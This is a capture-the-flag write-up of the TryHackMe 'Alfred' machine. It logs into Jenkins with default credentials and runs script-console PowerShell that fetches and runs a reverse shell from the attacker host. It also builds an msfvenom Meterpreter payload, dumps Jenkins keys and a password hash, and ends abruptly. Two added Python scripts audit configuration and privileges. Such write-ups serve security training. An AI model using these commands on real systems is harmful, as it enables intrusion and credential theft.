🧑🍳ALFRED
In this room, we will learn how to take advantage of a common misconfiguration in a widely used automation server (Jenkins: this tool is used to build continuous integration/development pipelines that let developers deploy their code automatically once they have made changes). After that, we will use an interesting privilege escalation method to gain full access to the system.
Since this is a Windows application, we will use Nishang to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we will use the reverse shell scripts.
The TryHackMe machine "Alfred" covers exploiting Jenkins through weak or default credentials to obtain an initial shell, after which privileges are escalated by abusing Windows authentication tokens. Here is a step-by-step summary:
Initial Access
Initial Scan: 3 open TCP ports are identified with an Nmap scan.
Login Panel Credentials: the Jenkins login panel's default credentials are found to be "admin:admin".
Exploiting Jenkins: Nishang's Invoke-PowerShellTcp script is served from our Python web server, downloaded onto the Jenkins host and run from the Java-based script console that Jenkins exposes, giving us initial access to the system via a reverse shell.
Shell Swap
Payload Generation: msfvenom is used to generate an exe payload for the shell swap.
Payload Download and Execution: the payload is downloaded onto the target system and executed.
Metasploit Setup: a Metasploit multi/handler listener is configured to establish a Meterpreter session.
Privilege Escalation
Tokens and Privileges: the available tokens and privileges are examined with commands such as whoami /priv and list_tokens -g.
Using Incognito: the Incognito module is loaded in Metasploit and used to exploit the available privileges.
Process Migration: we migrate to a stable process such as services.exe to ensure the right permissions.
Reading the User Flag: we drop back to a regular shell and read the user.txt flag located somewhere on the system.
Reading the Root Flag: finally, using the search command from earlier, we locate the path of the root.txt flag and read the root.txt file located in C:\Windows\System32\config.
This approach covers everything from identifying services and credentials to the initial exploitation of Jenkins, the shell swap using Metasploit and, finally, privilege escalation by abusing Windows authentication tokens and migrating into another process PID so that we hold NT AUTHORITY\SYSTEM across the whole system.
OFFENSIVE PENTESTING:
ALFRED MACHINE (JENKINS):
WE CHECK CONNECTIVITY; IT DOES NOT ANSWER ICMP PROBES, BECAUSE IT IS WINDOWS:
┌──(root㉿kali)-[~]
└─# ping -c 1 10.10.234.163
PING 10.10.234.163 (10.10.234.163) 56(84) bytes of data.
INVESTIGATING THE URL 10.10.234.163:80:
<br>
RIP Bruce Wayne<br><br>
Donations to <strong>alfred@wayneenterprises.com</strong> are greatly appreciated.
</center>
I CHECK FOR OTHER POSSIBLE DIRECTORIES:
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://10.10.234.163/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.234.163/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2024/01/21 23:10:37 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 289]
Progress: 4249 / 4615 (92.07%)===============================================================
2024/01/21 23:10:38 Finished
===============================================================
PORT AND VULNERABILITY SCAN:
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O -Pn --script "vuln" 10.10.234.163
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-21 22:59 UTC
Stats: 0:00:02 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:05:17 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 86.10% done; ETC: 23:05 (0:00:49 remaining)
Stats: 0:10:13 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.55% done; ETC: 23:10 (0:00:03 remaining)
Nmap scan report for ip-10-10-234-163.eu-west-1.compute.internal (10.10.234.163)
Host is up (0.0010s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| vulners:
| cpe:/a:microsoft:internet_information_services:7.5:
| CVE-2010-3972 10.0 https://vulners.com/cve/CVE-2010-3972
| SSV:20122 9.3 https://vulners.com/seebug/SSV:20122 *EXPLOIT*
| CVE-2010-2730 9.3 https://vulners.com/cve/CVE-2010-2730
| SSV:20121 4.3 https://vulners.com/seebug/SSV:20121 *EXPLOIT*
|_ CVE-2010-1899 4.3 https://vulners.com/cve/CVE-2010-1899
|_http-server-header: Microsoft-IIS/7.5
|_http-dombased-xss: Couldn't find any DOM based XSS.
3389/tcp open tcpwrapped
|_ssl-ccs-injection: No reply from server (TIMEOUT)
8080/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /robots.txt: Robots file
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
MAC Address: 02:A5:BD:32:71:37 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 or Windows 8 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 8.1 R1 (90%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (89%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 767.71 seconds
WE CONFIRM PORT 8080:
http://10.10.234.163:8080/robots.txt
# we don't want robots to click "build" links
User-agent: *
Disallow: /
http://10.10.234.163:8080/login?from=%2F
Welcome to Jenkins!
Username:
Contraseña:
Keep me signed in
WE MANAGE TO LOG IN WITH ADMIN:ADMIN:
[Jenkins]Jenkins admin | Desconectar
Hay una nueva versión de Jenkins disponible (2.249.1). descargar (listado de cambios).
O actualizar automáticamente
Go to plugin manager
Configure which of these warnings are shown
Warnings have been published for the following currently installed components.
Jenkins 2.190.1 core and libraries
Multiple security vulnerabilities in Jenkins 2.251 and earlier, LTS 2.235.3 and earlier
Multiple security vulnerabilities in Jenkins 2.227 and earlier, LTS 2.204.5 and earlier
Multiple vulnerabilities in Jenkins 2.218 and earlier, LTS 2.204.1 and earlier
Multiple security vulnerabilities in Jenkins 2.244 and earlier, LTS 2.235.1 and earlier
Subversion Plug-in 2.12.2
Stored XSS vulnerability
Git plugin 3.12.1
Stored XSS vulnerability
Email Extension Plugin 2.68
Missing hostname validation
Matrix Authorization Strategy Plugin 2.5
Stored XSS vulnerability
Timestamper 1.10
Stored XSS vulnerability
Credentials Binding Plugin 1.20
Improper masking of some secrets
Secrets are not masked in builds without build steps
Matrix Project Plugin 1.14
Stored XSS vulnerability in single axis builds tooltips
Stored XSS vulnerability in multiple axis builds tooltips
Lockable Resources plugin 2.6
CSRF vulnerability
Pipeline: Groovy 2.74
Sandbox bypass via default method parameter expression
Script Security Plugin 1.66
Sandbox bypass vulnerability
Sandbox bypass vulnerability
Stored XSS vulnerability
Sandbox bypass vulnerability
Sandbox bypass vulnerability
Mailer Plugin 1.29
Missing hostname validation
Manage Jenkins
Jenkins dashboard (menu: New Item, People, Build History, Manage Jenkins, My Views, Lockable Resources, Credentials, New View); no jobs in the queue, two idle executors, and one job listed:
Correcto 100% project 4 Año 2 Mes - #1 N/D 0.42 Seg Schedule a Build for project
ON THE JENKINS ADMIN PANEL AT http://10.10.234.163:8080/computer/(master)/script:
Script Console
Type in a Groovy script and execute it on the server. Useful for debugging and investigating problems. Use 'println' to see the output (if you use System.out, it goes to the server's stdout, which is harder to see). Example:
println System.getenv("PATH")
println "uname -a".execute().text
This execution happens in the agent's virtual machine (JVM).
All classes from all plugins are visible. The packages jenkins.*, jenkins.model.*, hudson.*, and hudson.model.* are imported automatically.
println "whoami".execute().text
Result
alfred\bruce
SINCE WE SAW THAT WE CAN EXECUTE COMMANDS, WE WILL TRY TO PULL OUR SCRIPT FROM A PYTHON SERVER TO GET A REVERSE SHELL, LISTENING FOR IT WITH NETCAT:
println "powershell iex (New-Object Net.WebClient).DownloadString(\'http://10.10.217.63:8081/Invoke-PowerShellTcp.ps1\');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.217.63 -Port 443".execute().text
BINGO, OUR NETCAT CAUGHT THE SHELL:
┌──(root㉿kali)-[~/Downloads]
└─# python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
10.10.234.163 - - [22/Jan/2024 00:41:29] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
10.10.234.163 - - [22/Jan/2024 00:41:33] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
┌──(root㉿kali)-[~]
└─# nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.217.63] from (UNKNOWN) [10.10.234.163] 49334
Windows PowerShell running as user bruce on ALFRED
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Program Files (x86)\Jenkins>whoami
alfred\bruce
PS C:\Program Files (x86)\Jenkins>
PS C:\Program Files (x86)\Jenkins> dir
Directory: C:\Program Files (x86)\Jenkins
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 10/26/2019 4:37 PM jobs
d---- 10/25/2019 9:54 PM jre
d---- 10/25/2019 9:55 PM logs
d---- 10/25/2019 9:55 PM nodes
d---- 10/25/2019 7:58 PM plugins
d---- 10/26/2019 4:38 PM secrets
d---- 10/3/2020 3:42 PM updates
d---- 10/25/2019 9:55 PM userContent
d---- 10/25/2019 9:55 PM users
d---- 10/25/2019 9:54 PM war
d---- 10/25/2019 7:58 PM workflow-libs
d---- 10/26/2019 4:38 PM workspace
-a--- 1/21/2024 10:27 PM 0 .lastStarted
-a--- 1/21/2024 11:55 PM 36 .owner
-a--- 1/21/2024 10:27 PM 1742 config.xml
-a--- 1/21/2024 10:27 PM 156 hudson.model.UpdateCenter.xml
-a--- 10/25/2019 7:58 PM 374 hudson.plugins.git.GitTool.xml
-a--- 10/25/2019 9:55 PM 1712 identity.key.enc
-a--- 1/21/2024 11:12 PM 117240 jenkins.err.log
-a--- 9/25/2019 2:10 PM 371200 jenkins.exe
-a--- 4/5/2015 6:05 PM 219 jenkins.exe.config
-a--- 10/25/2019 7:59 PM 7 jenkins.install.InstallUtil.lastExecVersion
-a--- 10/25/2019 7:59 PM 7 jenkins.install.UpgradeWizard.state
-a--- 10/25/2019 7:59 PM 177 jenkins.model.JenkinsLocationConfiguration.xml
-a--- 1/21/2024 10:26 PM 1992 jenkins.out.log
-a--- 1/21/2024 10:26 PM 4 jenkins.pid
-a--- 10/25/2019 9:55 PM 171 jenkins.telemetry.Correlator.xml
-a--- 9/25/2019 2:05 PM 78245883 jenkins.war
-a--- 1/21/2024 10:26 PM 22494 jenkins.wrapper.log
-a--- 9/25/2019 2:10 PM 2875 jenkins.xml
-a--- 1/21/2024 10:27 PM 907 nodeMonitors.xml
-a--- 10/26/2019 4:39 PM 129 queue.xml.bak
-a--- 10/25/2019 9:54 PM 64 secret.key
-a--- 10/25/2019 9:54 PM 0 secret.key.not-so-secret
PS C:\Program Files (x86)\Jenkins> type config.xml
<?xml version='1.1' encoding='UTF-8'?>
<hudson>
<disabledAdministrativeMonitors>
<string>hudson.diagnosis.ReverseProxySetupMonitor</string>
</disabledAdministrativeMonitors>
<version>2.190.1</version>
<installStateName>RUNNING</installStateName>
<numExecutors>2</numExecutors>
<mode>NORMAL</mode>
<useSecurity>true</useSecurity>
<authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
<denyAnonymousReadAccess>true</denyAnonymousReadAccess>
</authorizationStrategy>
<securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
<disableSignup>true</disableSignup>
<enableCaptcha>false</enableCaptcha>
</securityRealm>
<disableRememberMe>false</disableRememberMe>
<projectNamingStrategy class="jenkins.model.ProjectNamingStrategy$DefaultProjectNamingStrategy"/>
<workspaceDir>${JENKINS_HOME}/workspace/${ITEM_FULL_NAME}</workspaceDir>
<buildsDir>${ITEM_ROOTDIR}/builds</buildsDir>
<jdks/>
<viewsTabBar class="hudson.views.DefaultViewsTabBar"/>
<myViewsTabBar class="hudson.views.DefaultMyViewsTabBar"/>
<clouds/>
<scmCheckoutRetryCount>0</scmCheckoutRetryCount>
<views>
<hudson.model.AllView>
<owner class="hudson" reference="../../.."/>
<name>all</name>
<filterExecutors>false</filterExecutors>
<filterQueue>false</filterQueue>
<properties class="hudson.model.View$PropertyList"/>
</hudson.model.AllView>
</views>
<primaryView>all</primaryView>
<slaveAgentPort>-1</slaveAgentPort>
<label></label>
<crumbIssuer class="hudson.security.csrf.DefaultCrumbIssuer">
<excludeClientIPFromCrumb>false</excludeClientIPFromCrumb>
</crumbIssuer>
<nodeProperties/>
<globalNodeProperties/>
</hudson>
PS C:\Program Files (x86)\Jenkins>
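An added example, not part of the original writeup: a Python audit of the config.xml printed above. It parses the file and flags the settings that turned the admin:admin login into code execution, above all FullControlOnceLoggedInAuthorizationStrategy, which makes every authenticated user a full administrator with access to the Groovy script console. The embedded XML is a trimmed copy of that file; the hardened variant using ProjectMatrixAuthorizationStrategy is constructed for comparison.

```python
import xml.etree.ElementTree as ET

# Trimmed copy of the config.xml dumped from the Alfred box above (sample input).
SAMPLE_CONFIG_XML = """<hudson>
  <version>2.190.1</version>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
    <enableCaptcha>false</enableCaptcha>
  </securityRealm>
  <slaveAgentPort>-1</slaveAgentPort>
  <crumbIssuer class="hudson.security.csrf.DefaultCrumbIssuer">
    <excludeClientIPFromCrumb>false</excludeClientIPFromCrumb>
  </crumbIssuer>
</hudson>
"""

# Constructed hardened variant: a matrix strategy lets permissions be scoped
# per user/group instead of handing every logged-in account full control.
HARDENED_CONFIG_XML = SAMPLE_CONFIG_XML.replace(
    "hudson.security.FullControlOnceLoggedInAuthorizationStrategy",
    "hudson.security.ProjectMatrixAuthorizationStrategy",
)

# Authorization strategies under which any authenticated account is an
# administrator and can therefore reach /script (the Groovy console).
PERMISSIVE_STRATEGIES = {
    "hudson.security.FullControlOnceLoggedInAuthorizationStrategy",
    "hudson.security.AuthorizationStrategy$Unsecured",
}


def _text(node, tag, default=None):
    """Text of the first child <tag>, stripped, or default if absent/empty."""
    child = node.find(tag)
    if child is None or child.text is None:
        return default
    return child.text.strip()


def audit_jenkins_config(xml_text):
    """Return a list of (severity, finding) tuples for a Jenkins config.xml."""
    root = ET.fromstring(xml_text)
    findings = []

    if _text(root, "useSecurity", "false").lower() != "true":
        findings.append(("HIGH", "useSecurity is not true: no authentication at all"))

    strategy = root.find("authorizationStrategy")
    cls = strategy.get("class", "") if strategy is not None else ""
    if cls in PERMISSIVE_STRATEGIES:
        findings.append(("HIGH", "authorizationStrategy %s: every logged-in user is an "
                                 "admin and can use the Groovy script console" % cls))
    if strategy is not None and \
            _text(strategy, "denyAnonymousReadAccess", "false").lower() != "true":
        findings.append(("MEDIUM", "anonymous users have read access (jobs, build output)"))

    realm = root.find("securityRealm")
    if realm is not None and _text(realm, "disableSignup", "false").lower() != "true":
        findings.append(("HIGH", "self sign-up is enabled: anyone can create an account"))

    # -1 disables the inbound (JNLP) agent port; anything else exposes it.
    if _text(root, "slaveAgentPort", "-1") != "-1":
        findings.append(("LOW", "inbound agent port is enabled; restrict it if unused"))

    if root.find("crumbIssuer") is None:
        findings.append(("MEDIUM", "no crumbIssuer: CSRF protection is disabled"))

    return findings


if __name__ == "__main__":
    for label, cfg in (("alfred", SAMPLE_CONFIG_XML), ("hardened", HARDENED_CONFIG_XML)):
        print("[%s]" % label)
        for severity, finding in audit_jenkins_config(cfg) or [("OK", "no findings")]:
            print("  %-6s %s" % (severity, finding))
```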
PS C:\Program Files (x86)\Jenkins> type jenkins.xml
<!--
The MIT License
Copyright (c) 2004-2017, Sun Microsystems, Inc., Kohsuke Kawaguchi, Oleg Nenashev, and other Jenkins contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
-->
<!--
Windows service definition for Jenkins.
To uninstall, run "jenkins.exe stop" to stop the service, then "jenkins.exe uninstall" to uninstall the service.
Both commands don't produce any output if the execution is successful.
-->
<service>
<id>Jenkins</id>
<name>Jenkins</name>
<description>This service runs Jenkins automation server.</description>
<env name="JENKINS_HOME" value="%BASE%"/>
<!--
if you'd like to run Jenkins with a specific version of Java, specify a full path to java.exe.
The following value assumes that you have java in your PATH.
-->
<executable>%BASE%\jre\bin\java</executable>
<arguments>-Xrs -Xmx256m -Dhudson.lifecycle=hudson.lifecycle.WindowsServiceLifecycle -jar "%BASE%\jenkins.war" --httpPort=8080 --webroot="%BASE%\war"</arguments>
<!--
interactive flag causes the empty black Java window to be displayed.
I'm still debugging this.
<interactive />
-->
<logmode>rotate</logmode>
<onfailure action="restart" />
<!--
In the case WinSW gets terminated and leaks the process, we want to abort
these runaway JAR processes on startup to prevent corruption of JENKINS_HOME.
So this extension is enabled by default.
-->
<extensions>
<!-- This is a sample configuration for the RunawayProcessKiller extension. -->
<extension enabled="true"
className="winsw.Plugins.RunawayProcessKiller.RunawayProcessKillerExtension"
id="killOnStartup">
<pidfile>%BASE%\jenkins.pid</pidfile>
<stopTimeout>10000</stopTimeout>
<stopParentFirst>false</stopParentFirst>
</extension>
</extensions>
<!-- See the referenced examples for more options -->
</service>
PS C:\Program Files (x86)\Jenkins> type secret.key
cb2ae36e1862a23b3adfd393282eae76f896f2efb0a4da79643e33afc616751e
PS C:\Program Files (x86)\Jenkins\secrets> type initialAdminPassword
44b934851a1b4275a4b23864b35eb382
PS C:\Program Files (x86)\Jenkins\secrets> type master.key
8f79dbdfea03f2e4403e72d9e16b683028de4ef9e00a448b6dd0f2b78258bd0f6c01c6922ffaa0c784038aa59e268fab0d58d10bd40110930f3db32a3bff82370458db4f0c7ec9c510e1b339119b5fd108256c37ab4d17d2503887b2ea27c8f55e0813777e3f4043310dfd3a17cc1267fa48b188a5fdd3f04f90be9da7927594
PS C:\Program Files (x86)\Jenkins\users> dir
Directory: C:\Program Files (x86)\Jenkins\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 10/25/2019 10:16 PM admin_2402805306885826995
-a--- 10/25/2019 9:55 PM 300 users.xml
PS C:\Program Files (x86)\Jenkins\users> type users.xml
<?xml version='1.1' encoding='UTF-8'?>
<hudson.model.UserIdMapper>
<version>1</version>
<idToDirectoryNameMap class="concurrent-hash-map">
<entry>
<string>admin</string>
<string>admin_2402805306885826995</string>
</entry>
</idToDirectoryNameMap>
</hudson.model.UserIdMapper>
PS C:\Program Files (x86)\Jenkins\users>
PS C:\Program Files (x86)\Jenkins\users\admin_2402805306885826995> dir
Directory: C:\Program Files (x86)\Jenkins\users\admin_2402805306885826995
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/25/2019 10:16 PM 2854 config.xml
PS C:\Program Files (x86)\Jenkins\users\admin_2402805306885826995> type config.xml
<?xml version='1.1' encoding='UTF-8'?>
<user>
<version>10</version>
<id>admin</id>
<fullName>admin</fullName>
<description></description>
<properties>
<jenkins.security.ApiTokenProperty>
<tokenStore>
<tokenList/>
</tokenStore>
</jenkins.security.ApiTokenProperty>
<com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.3.0">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList/>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
<hudson.tasks.Mailer_-UserProperty plugin="mailer@1.29">
<emailAddress></emailAddress>
</hudson.tasks.Mailer_-UserProperty>
<hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.68">
<triggers/>
</hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>
<jenkins.security.LastGrantedAuthoritiesProperty>
<roles>
<string>authenticated</string>
</roles>
<timestamp>1572029777633</timestamp>
</jenkins.security.LastGrantedAuthoritiesProperty>
<hudson.model.MyViewsProperty>
<primaryViewName></primaryViewName>
<views>
<hudson.model.AllView>
<owner class="hudson.model.MyViewsProperty" reference="../../.."/>
<name>all</name>
<filterExecutors>false</filterExecutors>
<filterQueue>false</filterQueue>
<properties class="hudson.model.View$PropertyList"/>
</hudson.model.AllView>
</views>
</hudson.model.MyViewsProperty>
<org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.3.2">
<providerId>default</providerId>
</org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
<hudson.model.PaneStatusProperties>
<collapsed/>
</hudson.model.PaneStatusProperties>
<hudson.security.HudsonPrivateSecurityRealm_-Details>
<passwordHash>#jbcrypt:$2a$10$mNcW44UpK2W/FfiniX6qfeIhqBnJqLQLw8MLaP/lTM1vmh.E6AGAS</passwordHash>
</hudson.security.HudsonPrivateSecurityRealm_-Details>
<org.jenkinsci.main.modules.cli.auth.ssh.UserPropertyImpl>
<authorizedKeys></authorizedKeys>
</org.jenkinsci.main.modules.cli.auth.ssh.UserPropertyImpl>
<jenkins.security.seed.UserSeedProperty>
<seed>9c55e7a1a712f843</seed>
</jenkins.security.seed.UserSeedProperty>
<hudson.search.UserSearchProperty>
<insensitiveSearch>true</insensitiveSearch>
</hudson.search.UserSearchProperty>
</properties>
</user>
PS C:\Program Files (x86)\Jenkins> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
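An added example, not from the original writeup: a Python parser for the whoami /priv output above that reports which privileges held by the account running Jenkins are known escalation primitives. SeImpersonatePrivilege being enabled is what lets the later incognito step impersonate service tokens; held-but-disabled privileges are reported too, because a process can re-enable any privilege its token holds. The sample rows are copied from the output above.

```python
import re

# Privileges that let a service account escalate when its token holds them.
SENSITIVE_PRIVILEGES = {
    "SeImpersonatePrivilege": "impersonate service tokens (what incognito relies on)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open and inject into any process, including SYSTEM ones",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
}

# Sample input: the relevant rows of the `whoami /priv` output captured above.
SAMPLE_WHOAMI_PRIV = """PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeDebugPrivilege                Debug programs                            Enabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
"""

# One table row: privilege name, free-text description, then the state column.
ROW_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)$")


def parse_whoami_priv(text):
    """Return {privilege: (description, enabled)} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        match = ROW_RE.match(line.strip())
        if match:
            name, desc, state = match.groups()
            privs[name] = (desc, state == "Enabled")
    return privs


def assess_privileges(text):
    """Sorted (privilege, enabled, why_it_matters) for every sensitive privilege held.

    A 'Disabled' privilege is still held by the token: the process only needs
    to call AdjustTokenPrivileges to switch it on, so both states are reported.
    """
    findings = []
    for name, (_desc, enabled) in parse_whoami_priv(text).items():
        if name in SENSITIVE_PRIVILEGES:
            findings.append((name, enabled, SENSITIVE_PRIVILEGES[name]))
    return sorted(findings)


if __name__ == "__main__":
    for name, enabled, reason in assess_privileges(SAMPLE_WHOAMI_PRIV):
        print("%-30s %-8s %s" % (name, "ENABLED" if enabled else "held", reason))
```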
PS C:\Users> cd bruce
PS C:\Users\bruce> dir
Directory: C:\Users\bruce
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 10/25/2019 8:05 PM .groovy
d-r-- 10/25/2019 9:51 PM Contacts
d-r-- 10/25/2019 11:22 PM Desktop
d-r-- 10/26/2019 4:43 PM Documents
d-r-- 10/26/2019 4:43 PM Downloads
d-r-- 10/25/2019 9:51 PM Favorites
d-r-- 10/25/2019 9:51 PM Links
d-r-- 10/25/2019 9:51 PM Music
d-r-- 10/25/2019 10:26 PM Pictures
d-r-- 10/25/2019 9:51 PM Saved Games
d-r-- 10/25/2019 9:51 PM Searches
d-r-- 10/25/2019 9:51 PM Videos
FLAG:
PS C:\Users\bruce> cd Desktop
PS C:\Users\bruce\Desktop> dir
Directory: C:\Users\bruce\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/25/2019 11:22 PM 32 user.txt
PS C:\Users\bruce\Desktop> type user.txt
79007a09481963edf2e1321abd9ae2a0
NOW WE CONNECT USING METASPLOIT AND GET A METERPRETER SESSION TO MAKE PRIVILEGE ESCALATION EASIER; FIRST WE CREATE AN EXPLOIT PAYLOAD WITH MSFVENOM TO GET THE REVERSE METERPRETER SHELL AND LISTEN FOR IT WITH MULTI/HANDLER:
┌──(root㉿kali)-[~/Downloads]
└─# msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.217.63 LPORT=4444 -f exe -o shell-paimon.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of exe file: 73802 bytes
Saved as: shell-paimon.exe
WE SERVE IT WITH THE PYTHON SERVER:
┌──(root㉿kali)-[~/Downloads]
└─# python3 -m http.server 8081
Serving HTTP on 0.0.0.0 port 8081 (http://0.0.0.0:8081/) ...
WE DOWNLOAD THE FILE CREATED BY MSFVENOM ONTO THE JENKINS VICTIM MACHINE, THEN RUN IT TO GET THE CONNECTION IN MULTI/HANDLER WITH THE METERPRETER SESSION:
JUST TESTS:
println "powershell iex (New-Object Net.WebClient).DownloadString(\'http://10.10.217.63:8081/shell-paimon.exe\');shell-paimon.exe".execute().text
println "powershell (New-Object System.Net.WebClient).DownloadFile('http://10.10.217.63:8081/shell-paimon.exe','shell-paimon.exe')".execute().text
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.217.63:8081/shell-paimon.exe','shell-paimon.exe')"
METERPRETER:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.143.22:8081/shell-paimon.exe','shell-paimon.exe')"
WE RUN THE FILE:
Start-Process "shell-paimon.exe"
NETCAT:
